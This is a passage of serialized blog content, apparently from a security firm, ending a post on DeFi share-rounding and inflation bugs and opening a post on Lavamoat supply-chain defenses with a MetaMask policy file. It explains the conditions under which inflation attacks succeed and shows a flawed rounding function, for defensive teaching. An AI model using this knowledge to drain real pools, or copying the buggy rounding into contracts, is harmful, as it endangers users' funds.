_product",{"type":26,"tag":137,"props":49049,"children":49050},{"style":5601},[49051],{"type":32,"value":6099},{"type":26,"tag":137,"props":49053,"children":49054},{"class":5559,"line":5417},[49055,49059,49064],{"type":26,"tag":137,"props":49056,"children":49057},{"style":6009},[49058],{"type":32,"value":49042},{"type":26,"tag":137,"props":49060,"children":49061},{"style":5584},[49062],{"type":32,"value":49063}," _pseudo",{"type":26,"tag":137,"props":49065,"children":49066},{"style":5601},[49067],{"type":32,"value":6099},{"type":26,"tag":137,"props":49069,"children":49070},{"class":5559,"line":5642},[49071,49076],{"type":26,"tag":137,"props":49072,"children":49073},{"style":6009},[49074],{"type":32,"value":49075},"    bool",{"type":26,"tag":137,"props":49077,"children":49078},{"style":5584},[49079],{"type":32,"value":49080}," _maxSharePrice\n",{"type":26,"tag":137,"props":49082,"children":49083},{"class":5559,"line":5745},[49084],{"type":26,"tag":137,"props":49085,"children":49086},{"style":5601},[49087],{"type":32,"value":5742},{"type":26,"tag":137,"props":49089,"children":49090},{"class":5559,"line":5850},[49091],{"type":26,"tag":137,"props":49092,"children":49093},{"style":5573},[49094],{"type":32,"value":49095},"    private\n",{"type":26,"tag":137,"props":49097,"children":49098},{"class":5559,"line":5878},[49099],{"type":26,"tag":137,"props":49100,"children":49101},{"style":5573},[49102],{"type":32,"value":49103},"    pure\n",{"type":26,"tag":137,"props":49105,"children":49106},{"class":5559,"line":5891},[49107,49112,49116,49120],{"type":26,"tag":137,"props":49108,"children":49109},{"style":5610},[49110],{"type":32,"value":49111},"    returns",{"type":26,"tag":137,"props":49113,"children":49114},{"style":5601},[49115],{"type":32,"value":4625},{"type":26,"tag":137,"props":49117,"children":49118},{"style":6009},[49119],{"type":32,"value":48770},{"type":26,"tag":137,"props":49121,"children":49122},{"style":5601},[49123],{"type":32,"value":5742},{"type":26,"tag":137,"props":49125,"children":49126},{"class":5559,"line":5909},[49127],{"type":26,"tag":137,"props":49128,"children":49129},{"style":5601},[49130],{"type":32,"value":13471},{"type":26,"tag":137,"props":49132,"children":49133},{"class":5559,"line":5930},[49134,49138,49143,49147],{"type":26,"tag":137,"props":49135,"children":49136},{"style":5610},[49137],{"type":32,"value":19582},{"type":26,"tag":137,"props":49139,"children":49140},{"style":5601},[49141],{"type":32,"value":49142}," _maxSharePrice ",{"type":26,"tag":137,"props":49144,"children":49145},{"style":5590},[49146],{"type":32,"value":11161},{"type":26,"tag":137,"props":49148,"children":49149},{"style":5573},[49150],{"type":32,"value":49151}," true\n",{"type":26,"tag":137,"props":49153,"children":49154},{"class":5559,"line":5939},[49155,49160,49165,49169],{"type":26,"tag":137,"props":49156,"children":49157},{"style":5590},[49158],{"type":32,"value":49159},"        ?",{"type":26,"tag":137,"props":49161,"children":49162},{"style":5601},[49163],{"type":32,"value":49164}," _product % _pseudo ",{"type":26,"tag":137,"props":49166,"children":49167},{"style":5590},[49168],{"type":32,"value":11161},{"type":26,"tag":137,"props":49170,"children":49171},{"style":5626},[49172],{"type":32,"value":26870},{"type":26,"tag":137,"props":49174,"children":49175},{"class":5559,"line":6191},[49176,49181,49186,49190],{"type":26,"tag":137,"props":49177,"children":49178},{"style":5590},[49179],{"type":32,"value":49180},"            ?",{"type":26,"tag":137,"props":49182,"children":49183},{"style":5601},[49184],{"type":32,"value":49185}," _product ",{"type":26,"tag":137,"props":49187,"children":49188},{"style":5590},[49189],{"type":32,"value":7162},{"type":26,"tag":137,"props":49191,"children":49192},{"style":5601},[49193],{"type":32,"value":49194}," _pseudo\n",{"type":26,"tag":137,"props":49196,"children":49197},{"class":5559,"line":6208},[49198,49203,49207,49211,49216,49220],{"type":26,"tag":137,"props":49199,"children":49200},{"style":5590},[49201],{"type":32,"value":49202},"            :",{"type":26,"tag":137,"props":49204,"children":49205},{"style":5601},[49206],{"type":32,"value":49185},{"type":26,"tag":137,"props":49208,"children":49209},{"style":5590},[49210],{"type":32,"value":7162},{"type":26,"tag":137,"props":49212,"children":49213},{"style":5601},[49214],{"type":32,"value":49215}," _pseudo ",{"type":26,"tag":137,"props":49217,"children":49218},{"style":5590},[49219],{"type":32,"value":356},{"type":26,"tag":137,"props":49221,"children":49222},{"style":5626},[49223],{"type":32,"value":22035},{"type":26,"tag":137,"props":49225,"children":49226},{"class":5559,"line":6225},[49227,49232,49236,49240],{"type":26,"tag":137,"props":49228,"children":49229},{"style":5590},[49230],{"type":32,"value":49231},"        :",{"type":26,"tag":137,"props":49233,"children":49234},{"style":5601},[49235],{"type":32,"value":49185},{"type":26,"tag":137,"props":49237,"children":49238},{"style":5590},[49239],{"type":32,"value":7162},{"type":26,"tag":137,"props":49241,"children":49242},{"style":5601},[49243],{"type":32,"value":49244}," _pseudo;\n",{"type":26,"tag":137,"props":49246,"children":49247},{"class":5559,"line":6238},[49248],{"type":26,"tag":137,"props":49249,"children":49250},{"style":5601},[49251],{"type":32,"value":6507},{"type":26,"tag":35,"props":49253,"children":49254},{},[49255,49260],{"type":26,"tag":762,"props":49256,"children":49257},{},[49258],{"type":32,"value":49259},"Regardless of which way the share rounding occurs, this is a bug",{"type":32,"value":49261},". The correct way would be to do calculations in units of shares and force users to withdraw in increments of shares (and then round down the tokens ultimately received in the end).",{"type":26,"tag":35,"props":49263,"children":49264},{},[49265],{"type":32,"value":49266},"This is a really tricky invariant to reason about!",{"type":26,"tag":92,"props":49268,"children":49270},{"id":49269},"root-cause",[49271],{"type":32,"value":49272},"Root Cause",{"type":26,"tag":35,"props":49274,"children":49275},{},[49276],{"type":32,"value":49277},"Even though this sort of exploit seems pervasive, it requires quite a lot of factors to be exploitable.",{"type":26,"tag":35,"props":49279,"children":49280},{},[49281],{"type":32,"value":49282},"Most importantly, the share value needs to be inflatable. Usually, this requires an integer representation for both shares and tokens. The conversion rate also needs to be expressed in terms of the shares and tokens as opposed to being stored separately.",{"type":26,"tag":5512,"props":49284,"children":49286},{"className":7055,"code":49285,"language":7054,"meta":7,"style":7},"totalDepositShares * _amount / pseudoTotalPool\n",[49287],{"type":26,"tag":130,"props":49288,"children":49289},{"__ignoreMap":7},[49290],{"type":26,"tag":137,"props":49291,"children":49292},{"class":5559,"line":5560},[49293,49298,49302,49307,49311],{"type":26,"tag":137,"props":49294,"children":49295},{"style":5601},[49296],{"type":32,"value":49297},"totalDepositShares ",{"type":26,"tag":137,"props":49299,"children":49300},{"style":5590},[49301],{"type":32,"value":7152},{"type":26,"tag":137,"props":49303,"children":49304},{"style":5601},[49305],{"type":32,"value":49306}," _amount ",{"type":26,"tag":137,"props":49308,"children":49309},{"style":5590},[49310],{"type":32,"value":7162},{"type":26,"tag":137,"props":49312,"children":49313},{"style":5601},[49314],{"type":32,"value":49315}," pseudoTotalPool\n",{"type":26,"tag":35,"props":49317,"children":49318},{},[49319],{"type":32,"value":49320},"The second critical requirement is a generally empty pool. Inflating the share value means that all other shares also rise in value. If there are shares that are not controlled by the attacker, this would mean giving other users free money, almost definitely stopping inflation attacks.",{"type":26,"tag":35,"props":49322,"children":49323},{},[49324,49326,49330],{"type":32,"value":49325},"Finally, there must be improper rounding or accounting. This last requirement is generally easiest to satisfy. Share rounding is a new attack vector, and people haven't thought carefully about proper treatment of dust. Have you analyzed ",{"type":26,"tag":762,"props":49327,"children":49328},{},[49329],{"type":32,"value":22510},{"type":32,"value":49331}," integer division?",{"type":26,"tag":92,"props":49333,"children":49335},{"id":49334},"mitigations",[49336],{"type":32,"value":49337},"Mitigations",{"type":26,"tag":35,"props":49339,"children":49340},{},[49341],{"type":32,"value":49342},"The easiest way to prevent this attack is to prevent share values from being manipulated. An unexpectedly high share value can lead to denial of service scenarios and is probably worth mitigating by itself.",{"type":26,"tag":35,"props":49344,"children":49345},{},[49346,49348,49355],{"type":32,"value":49347},"The best way is to ensure that the pool has some amount of deposits on deployment, whether operationally or programmatically. As ",{"type":26,"tag":41,"props":49349,"children":49352},{"href":49350,"rel":49351},"https://twitter.com/danielvf/status/1746306320553152615",[45],[49353],{"type":32,"value":49354},"@danielvf notes",{"type":32,"value":49356},", protocols like Uniswap burn a portion of the initial deposit for this very reason.",{"type":26,"tag":5512,"props":49358,"children":49360},{"className":7055,"code":49359,"language":7054,"meta":7,"style":7},"if (_totalSupply == 0) {\n    liquidity = Math.sqrt(amount0.mul(amount1)).sub(MINIMUM_LIQUIDITY);\n   _mint(address(0), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens\n} else {\n",[49361],{"type":26,"tag":130,"props":49362,"children":49363},{"__ignoreMap":7},[49364,49388,49435,49469],{"type":26,"tag":137,"props":49365,"children":49366},{"class":5559,"line":5560},[49367,49371,49376,49380,49384],{"type":26,"tag":137,"props":49368,"children":49369},{"style":5610},[49370],{"type":32,"value":18171},{"type":26,"tag":137,"props":49372,"children":49373},{"style":5601},[49374],{"type":32,"value":49375}," (_totalSupply ",{"type":26,"tag":137,"props":49377,"children":49378},{"style":5590},[49379],{"type":32,"value":11161},{"type":26,"tag":137,"props":49381,"children":49382},{"style":5626},[49383],{"type":32,"value":5629},{"type":26,"tag":137,"props":49385,"children":49386},{"style":5601},[49387],{"type":32,"value":17395},{"type":26,"tag":137,"props":49389,"children":49390},{"class":5559,"line":5412},[49391,49396,49400,49405,49410,49415,49420,49425,49430],{"type":26,"tag":137,"props":49392,"children":49393},{"style":5601},[49394],{"type":32,"value":49395},"    liquidity ",{"type":26,"tag":137,"props":49397,"children":49398},{"style":5590},[49399],{"type":32,"value":289},{"type":26,"tag":137,"props":49401,"children":49402},{"style":5601},[49403],{"type":32,"value":49404}," Math.",{"type":26,"tag":137,"props":49406,"children":49407},{"style":5682},[49408],{"type":32,"value":49409},"sqrt",{"type":26,"tag":137,"props":49411,"children":49412},{"style":5601},[49413],{"type":32,"value":49414},"(amount0.",{"type":26,"tag":137,"props":49416,"children":49417},{"style":5682},[49418],{"type":32,"value":49419},"mul",{"type":26,"tag":137,"props":49421,"children":49422},{"style":5601},[49423],{"type":32,"value":49424},"(amount1)).",{"type":26,"tag":137,"props":49426,"children":49427},{"style":5682},[49428],{"type":32,"value":49429},"sub",{"type":26,"tag":137,"props":49431,"children":49432},{"style":5601},[49433],{"type":32,"value":49434},"(MINIMUM_LIQUIDITY);\n",{"type":26,"tag":137,"props":49436,"children":49437},{"class":5559,"line":5417},[49438,49443,49447,49451,49455,49459,49464],{"type":26,"tag":137,"props":49439,"children":49440},{"style":5682},[49441],{"type":32,"value":49442},"   _mint",{"type":26,"tag":137,"props":49444,"children":49445},{"style":5601},[49446],{"type":32,"value":165},{"type":26,"tag":137,"props":49448,"children":49449},{"style":6009},[49450],{"type":32,"value":35236},{"type":26,"tag":137,"props":49452,"children":49453},{"style":5601},[49454],{"type":32,"value":165},{"type":26,"tag":137,"props":49456,"children":49457},{"style":5626},[49458],{"type":32,"value":1817},{"type":26,"tag":137,"props":49460,"children":49461},{"style":5601},[49462],{"type":32,"value":49463},"), MINIMUM_LIQUIDITY); ",{"type":26,"tag":137,"props":49465,"children":49466},{"style":5564},[49467],{"type":32,"value":49468},"// permanently lock the first MINIMUM_LIQUIDITY tokens\n",{"type":26,"tag":137,"props":49470,"children":49471},{"class":5559,"line":5642},[49472,49477,49481],{"type":26,"tag":137,"props":49473,"children":49474},{"style":5601},[49475],{"type":32,"value":49476},"} ",{"type":26,"tag":137,"props":49478,"children":49479},{"style":5610},[49480],{"type":32,"value":5902},{"type":26,"tag":137,"props":49482,"children":49483},{"style":5601},[49484],{"type":32,"value":5875},{"type":26,"tag":35,"props":49486,"children":49487},{},[49488,49490,49497],{"type":32,"value":49489},"Alternatively, ",{"type":26,"tag":41,"props":49491,"children":49494},{"href":49492,"rel":49493},"https://github.com/SynonymFinance/smart-contracts-public/blob/759c6afe45720e26d731f081dfc747787ad7ae20/evm/src/contracts/lendingHub/HubInterestUtilities.sol#L52-L53",[45],[49495],{"type":32,"value":49496},"storing the conversion rate separately",{"type":32,"value":49498}," can also suffice. A key factor is that depositing additional tokens or burning shares affects the conversion rate. If the conversion rate is hardcoded and updated only during interest accrual, there's nothing to manipulate.",{"type":26,"tag":5512,"props":49500,"children":49502},{"className":7055,"code":49501,"language":7054,"meta":7,"style":7},"accrualIndices.borrowed = accrualIndices.borrowed * borrowInterestFactor / precision;\naccrualIndices.deposited = accrualIndices.deposited * depositInterestFactor / precision;\n",[49503],{"type":26,"tag":130,"props":49504,"children":49505},{"__ignoreMap":7},[49506,49541],{"type":26,"tag":137,"props":49507,"children":49508},{"class":5559,"line":5560},[49509,49514,49518,49523,49527,49532,49536],{"type":26,"tag":137,"props":49510,"children":49511},{"style":5601},[49512],{"type":32,"value":49513},"accrualIndices.borrowed ",{"type":26,"tag":137,"props":49515,"children":49516},{"style":5590},[49517],{"type":32,"value":289},{"type":26,"tag":137,"props":49519,"children":49520},{"style":5601},[49521],{"type":32,"value":49522}," accrualIndices.borrowed ",{"type":26,"tag":137,"props":49524,"children":49525},{"style":5590},[49526],{"type":32,"value":7152},{"type":26,"tag":137,"props":49528,"children":49529},{"style":5601},[49530],{"type":32,"value":49531}," borrowInterestFactor ",{"type":26,"tag":137,"props":49533,"children":49534},{"style":5590},[49535],{"type":32,"value":7162},{"type":26,"tag":137,"props":49537,"children":49538},{"style":5601},[49539],{"type":32,"value":49540}," precision;\n",{"type":26,"tag":137,"props":49542,"children":49543},{"class":5559,"line":5412},[49544,49549,49553,49558,49562,49567,49571],{"type":26,"tag":137,"props":49545,"children":49546},{"style":5601},[49547],{"type":32,"value":49548},"accrualIndices.deposited ",{"type":26,"tag":137,"props":49550,"children":49551},{"style":5590},[49552],{"type":32,"value":289},{"type":26,"tag":137,"props":49554,"children":49555},{"style":5601},[49556],{"type":32,"value":49557}," accrualIndices.deposited ",{"type":26,"tag":137,"props":49559,"children":49560},{"style":5590},[49561],{"type":32,"value":7152},{"type":26,"tag":137,"props":49563,"children":49564},{"style":5601},[49565],{"type":32,"value":49566}," depositInterestFactor ",{"type":26,"tag":137,"props":49568,"children":49569},{"style":5590},[49570],{"type":32,"value":7162},{"type":26,"tag":137,"props":49572,"children":49573},{"style":5601},[49574],{"type":32,"value":49540},{"type":26,"tag":35,"props":49576,"children":49577},{},[49578],{"type":32,"value":49579},"We also want to note some general takeaways:",{"type":26,"tag":35,"props":49581,"children":49582},{},[49583,49585,49590],{"type":32,"value":49584},"Invariant testing is overhyped, but is quite applicable here. Instead of attempting to reason about effects after a state change, ",{"type":26,"tag":762,"props":49586,"children":49587},{},[49588],{"type":32,"value":49589},"apply the state changes and check the invariant",{"type":32,"value":470},{"type":26,"tag":35,"props":49592,"children":49593},{},[49594],{"type":32,"value":49595},"From a protocol design perspective, users are withdrawing shares, not tokens. This is an important distinction. Your accounting logic should reason in terms of shares when possible.",{"type":26,"tag":35,"props":49597,"children":49598},{},[49599],{"type":32,"value":49600},"And finally, correct rounding behavior should still be accounted for, even if it doesn't seem impactful.",{"type":26,"tag":92,"props":49602,"children":49603},{"id":31526},[49604],{"type":32,"value":21540},{"type":26,"tag":35,"props":49606,"children":49607},{},[49608],{"type":32,"value":49609},"Rounding forces protocol developers to think carefully about dust. It's not always enough to round against the user. While initially this seems like a novel, scary attack vector, much of the impact can be mitigated operationally.",{"type":26,"tag":35,"props":49611,"children":49612},{},[49613],{"type":32,"value":49614},"As a final exercise to the reader: what is the correct rounding behavior during liquidations?",{"type":26,"tag":7949,"props":49616,"children":49617},{},[49618],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":49620},[49621,49622,49623,49627,49628,49629],{"id":31609,"depth":5412,"text":31612},{"id":48543,"depth":5412,"text":48546},{"id":48662,"depth":5412,"text":48665,"children":49624},[49625,49626],{"id":48673,"depth":5417,"text":48676},{"id":48711,"depth":5417,"text":48714},{"id":49269,"depth":5412,"text":49272},{"id":49334,"depth":5412,"text":49337},{"id":31526,"depth":5412,"text":21540},"content:blog:2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs",{"_path":49634,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":49635,"description":49636,"author":49637,"image":49638,"date":49640,"isFeatured":18,"onBlogPage":18,"body":49641,"_type":5433,"_id":53120,"_source":5435,"_file":53121,"_stem":53122,"_extension":5438},"/blog/2024-06-10-supply-chain-attacks-a-new-era","Supply Chain Attacks: A New Era","Unpacking Lavamoat and how it fights supply chain attacks in Web3. We spill the beans on some sneaky bypasses, illustrating just how tricky it is to lock down JavaScript ecosystems.",[33796,33795],{"src":49639},"/posts/supply-chain-attacks-a-new-era/header.jpg","2024-06-10",{"type":23,"children":49642,"toc":53099},[49643,49647,49668,49673,49677,49682,49721,49727,49742,49760,49765,49770,49775,49788,50095,50121,50134,50139,50144,50158,50163,50176,50189,50420,50441,50476,50482,50487,50492,50706,50727,50733,50745,50835,50857,50893,50901,50919,51176,51202,51208,51222,51420,51439,51846,51859,51865,51884,51977,51982,51988,52001,52014,52100,52106,52118,52203,52215,52228,52234,52239,52253,52580,52585,52590,52596,52622,52677,52697,52750,52756,52761,52780,52791,52985,52991,53014,53020,53025,53038,53043,53048,53052,53057,53065,53095],{"type":26,"tag":92,"props":49644,"children":49645},{"id":21549},[49646],{"type":32,"value":21552},{"type":26,"tag":35,"props":49648,"children":49649},{},[49650,49657,49659,49666],{"type":26,"tag":41,"props":49651,"children":49654},{"href":49652,"rel":49653},"https://www.cloudflare.com/it-it/learning/security/what-is-a-supply-chain-attack/",[45],[49655],{"type":32,"value":49656},"Supply chain",{"type":32,"value":49658}," attacks are becoming ",{"type":26,"tag":41,"props":49660,"children":49663},{"href":49661,"rel":49662},"https://www.bleepingcomputer.com/news/security/ledger-dapp-supply-chain-attack-steals-600k-from-crypto-wallets/",[45],[49664],{"type":32,"value":49665},"increasingly popular in Web3",{"type":32,"value":49667},". In response, Lavamoat has emerged as a robust defense mechanism against supply chain attacks, offering sophisticated isolation and access control features. These help ensure that malicious dependencies cannot execute harmful code.",{"type":26,"tag":35,"props":49669,"children":49670},{},[49671],{"type":32,"value":49672},"In this article, we will explore how each component of Lavamoat works, and dive into the various bypasses we reported.",{"type":26,"tag":118,"props":49674,"children":49675},{"id":31609},[49676],{"type":32,"value":31612},{"type":26,"tag":35,"props":49678,"children":49679},{},[49680],{"type":32,"value":49681},"It is important to note that there are three different versions of LavaMoat:",{"type":26,"tag":4820,"props":49683,"children":49684},{},[49685,49697,49709],{"type":26,"tag":3430,"props":49686,"children":49687},{},[49688,49695],{"type":26,"tag":41,"props":49689,"children":49692},{"href":49690,"rel":49691},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/browserify",[45],[49693],{"type":32,"value":49694},"Lavamoat Browserify",{"type":32,"value":49696}," serves as a bundle packer. This helps organize and package JavaScript code for frontend deployment.",{"type":26,"tag":3430,"props":49698,"children":49699},{},[49700,49707],{"type":26,"tag":41,"props":49701,"children":49704},{"href":49702,"rel":49703},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/node",[45],[49705],{"type":32,"value":49706},"NodeJS Lavamoat",{"type":32,"value":49708}," is a variant of Lavamoat tailored specifically for Node.js environments.",{"type":26,"tag":3430,"props":49710,"children":49711},{},[49712,49719],{"type":26,"tag":41,"props":49713,"children":49716},{"href":49714,"rel":49715},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/allow-scripts",[45],[49717],{"type":32,"value":49718},"Lavamoat allow-scripts",{"type":32,"value":49720}," are used to prevent malicious code execution on lifecycle scripts.",{"type":26,"tag":118,"props":49722,"children":49724},{"id":49723},"lavamoats-security-features",[49725],{"type":32,"value":49726},"Lavamoat's Security Features",{"type":26,"tag":35,"props":49728,"children":49729},{},[49730,49732,49740],{"type":32,"value":49731},"The three most important features of Lavamoat",{"type":26,"tag":18065,"props":49733,"children":49734},{},[49735],{"type":26,"tag":41,"props":49736,"children":49738},{"href":32217,"ariaDescribedBy":49737,"dataFootnoteRef":7,"id":32219},[18072],[49739],{"type":32,"value":878},{"type":32,"value":49741}," are:",{"type":26,"tag":3426,"props":49743,"children":49744},{},[49745,49750,49755],{"type":26,"tag":3430,"props":49746,"children":49747},{},[49748],{"type":32,"value":49749},"Policy Files",{"type":26,"tag":3430,"props":49751,"children":49752},{},[49753],{"type":32,"value":49754},"NPM Anti Hijacking",{"type":26,"tag":3430,"props":49756,"children":49757},{},[49758],{"type":32,"value":49759},"Scuttling",{"type":26,"tag":35,"props":49761,"children":49762},{},[49763],{"type":32,"value":49764},"Let's go over them one by one.",{"type":26,"tag":21485,"props":49766,"children":49768},{"id":49767},"policy-files",[49769],{"type":32,"value":49749},{"type":26,"tag":35,"props":49771,"children":49772},{},[49773],{"type":32,"value":49774},"Policy files are one important feature of Lavamoat, as they limit access to the potentially dangeorus platform API and Globals.",{"type":26,"tag":35,"props":49776,"children":49777},{},[49778,49780,49787],{"type":32,"value":49779},"For example, take the ",{"type":26,"tag":41,"props":49781,"children":49784},{"href":49782,"rel":49783},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L77",[45],[49785],{"type":32,"value":49786},"Metamask Snap policy file",{"type":32,"value":7072},{"type":26,"tag":5512,"props":49789,"children":49791},{"className":33958,"code":49790,"language":33960,"meta":7,"style":7},"   \"@metamask/providers\": {\n      \"globals\": {\n        \"Event\": true,\n        \"addEventListener\": true,\n        \"chrome.runtime.connect\": true,\n        \"console\": true,\n        \"dispatchEvent\": true,\n        \"document.createElement\": true,\n        \"document.readyState\": true,\n        \"ethereum\": \"write\",\n        \"location.hostname\": true,\n        \"removeEventListener\": true,\n        \"web3\": true\n      },\n      \"packages\": {\n        \"@metamask/object-multiplex\": true,\n        \"@metamask/providers>@metamask/safe-event-emitter\": true\n",[49792],{"type":26,"tag":130,"props":49793,"children":49794},{"__ignoreMap":7},[49795,49807,49822,49842,49861,49881,49901,49921,49941,49961,49982,50002,50021,50037,50044,50059,50079],{"type":26,"tag":137,"props":49796,"children":49797},{"class":5559,"line":5560},[49798,49803],{"type":26,"tag":137,"props":49799,"children":49800},{"style":6837},[49801],{"type":32,"value":49802},"   \"@metamask/providers\"",{"type":26,"tag":137,"props":49804,"children":49805},{"style":5601},[49806],{"type":32,"value":39618},{"type":26,"tag":137,"props":49808,"children":49809},{"class":5559,"line":5412},[49810,49814,49818],{"type":26,"tag":137,"props":49811,"children":49812},{"style":6837},[49813],{"type":32,"value":39626},{"type":26,"tag":137,"props":49815,"children":49816},{"style":5584},[49817],{"type":32,"value":7072},{"type":26,"tag":137,"props":49819,"children":49820},{"style":5601},[49821],{"type":32,"value":5875},{"type":26,"tag":137,"props":49823,"children":49824},{"class":5559,"line":5417},[49825,49830,49834,49838],{"type":26,"tag":137,"props":49826,"children":49827},{"style":6837},[49828],{"type":32,"value":49829},"        \"Event\"",{"type":26,"tag":137,"props":49831,"children":49832},{"style":5584},[49833],{"type":32,"value":7072},{"type":26,"tag":137,"props":49835,"children":49836},{"style":5573},[49837],{"type":32,"value":15060},{"type":26,"tag":137,"props":49839,"children":49840},{"style":5601},[49841],{"type":32,"value":6099},{"type":26,"tag":137,"props":49843,"children":49844},{"class":5559,"line":5642},[49845,49849,49853,49857],{"type":26,"tag":137,"props":49846,"children":49847},{"style":6837},[49848],{"type":32,"value":39678},{"type":26,"tag":137,"props":49850,"children":49851},{"style":5584},[49852],{"type":32,"value":7072},{"type":26,"tag":137,"props":49854,"children":49855},{"style":5573},[49856],{"type":32,"value":15060},{"type":26,"tag":137,"props":49858,"children":49859},{"style":5601},[49860],{"type":32,"value":6099},{"type":26,"tag":137,"props":49862,"children":49863},{"class":5559,"line":5745},[49864,49869,49873,49877],{"type":26,"tag":137,"props":49865,"children":49866},{"style":6837},[49867],{"type":32,"value":49868},"        \"chrome.runtime.connect\"",{"type":26,"tag":137,"props":49870,"children":49871},{"style":5584},[49872],{"type":32,"value":7072},{"type":26,"tag":137,"props":49874,"children":49875},{"style":5573},[49876],{"type":32,"value":15060},{"type":26,"tag":137,"props":49878,"children":49879},{"style":5601},[49880],{"type":32,"value":6099},{"type":26,"tag":137,"props":49882,"children":49883},{"class":5559,"line":5850},[49884,49889,49893,49897],{"type":26,"tag":137,"props":49885,"children":49886},{"style":6837},[49887],{"type":32,"value":49888},"        \"console\"",{"type":26,"tag":137,"props":49890,"children":49891},{"style":5584},[49892],{"type":32,"value":7072},{"type":26,"tag":137,"props":49894,"children":49895},{"style":5573},[49896],{"type":32,"value":15060},{"type":26,"tag":137,"props":49898,"children":49899},{"style":5601},[49900],{"type":32,"value":6099},{"type":26,"tag":137,"props":49902,"children":49903},{"class":5559,"line":5878},[49904,49909,49913,49917],{"type":26,"tag":137,"props":49905,"children":49906},{"style":6837},[49907],{"type":32,"value":49908},"        \"dispatchEvent\"",{"type":26,"tag":137,"props":49910,"children":49911},{"style":5584},[49912],{"type":32,"value":7072},{"type":26,"tag":137,"props":49914,"children":49915},{"style":5573},[49916],{"type":32,"value":15060},{"type":26,"tag":137,"props":49918,"children":49919},{"style":5601},[49920],{"type":32,"value":6099},{"type":26,"tag":137,"props":49922,"children":49923},{"class":5559,"line":5891},[49924,49929,49933,49937],{"type":26,"tag":137,"props":49925,"children":49926},{"style":6837},[49927],{"type":32,"value":49928},"        \"document.createElement\"",{"type":26,"tag":137,"props":49930,"children":49931},{"style":5584},[49932],{"type":32,"value":7072},{"type":26,"tag":137,"props":49934,"children":49935},{"style":5573},[49936],{"type":32,"value":15060},{"type":26,"tag":137,"props":49938,"children":49939},{"style":5601},[49940],{"type":32,"value":6099},{"type":26,"tag":137,"props":49942,"children":49943},{"class":5559,"line":5909},[49944,49949,49953,49957],{"type":26,"tag":137,"props":49945,"children":49946},{"style":6837},[49947],{"type":32,"value":49948},"        \"document.readyState\"",{"type":26,"tag":137,"props":49950,"children":49951},{"style":5584},[49952],{"type":32,"value":7072},{"type":26,"tag":137,"props":49954,"children":49955},{"style":5573},[49956],{"type":32,"value":15060},{"type":26,"tag":137,"props":49958,"children":49959},{"style":5601},[49960],{"type":32,"value":6099},{"type":26,"tag":137,"props":49962,"children":49963},{"class":5559,"line":5930},[49964,49969,49973,49978],{"type":26,"tag":137,"props":49965,"children":49966},{"style":6837},[49967],{"type":32,"value":49968},"        \"ethereum\"",{"type":26,"tag":137,"props":49970,"children":49971},{"style":5584},[49972],{"type":32,"value":7072},{"type":26,"tag":137,"props":49974,"children":49975},{"style":6837},[49976],{"type":32,"value":49977}," \"write\"",{"type":26,"tag":137,"props":49979,"children":49980},{"style":5601},[49981],{"type":32,"value":6099},{"type":26,"tag":137,"props":49983,"children":49984},{"class":5559,"line":5939},[49985,49990,49994,49998],{"type":26,"tag":137,"props":49986,"children":49987},{"style":6837},[49988],{"type":32,"value":49989},"        \"location.hostname\"",{"type":26,"tag":137,"props":49991,"children":49992},{"style":5584},[49993],{"type":32,"value":7072},{"type":26,"tag":137,"props":49995,"children":49996},{"style":5573},[49997],{"type":32,"value":15060},{"type":26,"tag":137,"props":49999,"children":50000},{"style":5601},[50001],{"type":32,"value":6099},{"type":26,"tag":137,"props":50003,"children":50004},{"class":5559,"line":6191},[50005,50009,50013,50017],{"type":26,"tag":137,"props":50006,"children":50007},{"style":6837},[50008],{"type":32,"value":39778},{"type":26,"tag":137,"props":50010,"children":50011},{"style":5584},[50012],{"type":32,"value":7072},{"type":26,"tag":137,"props":50014,"children":50015},{"style":5573},[50016],{"type":32,"value":15060},{"type":26,"tag":137,"props":50018,"children":50019},{"style":5601},[50020],{"type":32,"value":6099},{"type":26,"tag":137,"props":50022,"children":50023},{"class":5559,"line":6208},[50024,50029,50033],{"type":26,"tag":137,"props":50025,"children":50026},{"style":6837},[50027],{"type":32,"value":50028},"        \"web3\"",{"type":26,"tag":137,"props":50030,"children":50031},{"style":5584},[50032],{"type":32,"value":7072},{"type":26,"tag":137,"props":50034,"children":50035},{"style":5573},[50036],{"type":32,"value":49151},{"type":26,"tag":137,"props":50038,"children":50039},{"class":5559,"line":6225},[50040],{"type":26,"tag":137,"props":50041,"children":50042},{"style":5601},[50043],{"type":32,"value":39795},{"type":26,"tag":137,"props":50045,"children":50046},{"class":5559,"line":6238},[50047,50051,50055],{"type":26,"tag":137,"props":50048,"children":50049},{"style":6837},[50050],{"type":32,"value":39803},{"type":26,"tag":137,"props":50052,"children":50053},{"style":5584},[50054],{"type":32,"value":7072},{"type":26,"tag":137,"props":50056,"children":50057},{"style":5601},[50058],{"type":32,"value":5875},{"type":26,"tag":137,"props":50060,"children":50061},{"class":5559,"line":6247},[50062,50067,50071,50075],{"type":26,"tag":137,"props":50063,"children":50064},{"style":6837},[50065],{"type":32,"value":50066},"        \"@metamask/object-multiplex\"",{"type":26,"tag":137,"props":50068,"children":50069},{"style":5584},[50070],{"type":32,"value":7072},{"type":26,"tag":137,"props":50072,"children":50073},{"style":5573},[50074],{"type":32,"value":15060},{"type":26,"tag":137,"props":50076,"children":50077},{"style":5601},[50078],{"type":32,"value":6099},{"type":26,"tag":137,"props":50080,"children":50081},{"class":5559,"line":6270},[50082,50087,50091],{"type":26,"tag":137,"props":50083,"children":50084},{"style":6837},[50085],{"type":32,"value":50086},"        